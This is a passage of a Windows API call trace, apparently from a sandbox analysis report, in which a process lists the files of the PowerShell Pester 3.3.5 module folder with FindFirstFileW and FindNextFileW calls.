lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.816] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.816] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0224.817] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.817] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0224.817] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.817] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.818] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0224.818] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0224.818] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0224.819] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.819] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.819] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0224.819] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0224.819] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0224.820] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.820] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0224.820] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0224.820] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0224.821] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0224.821] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0224.821] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0224.821] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0224.821] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0224.822] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0224.822] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0224.822] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.822] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0224.823] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.823] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.823] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0224.823] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0224.823] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0224.824] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.824] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0224.824] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0224.824] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0224.824] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0224.825] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0224.826] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0224.826] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0224.826] SetThreadErrorMode 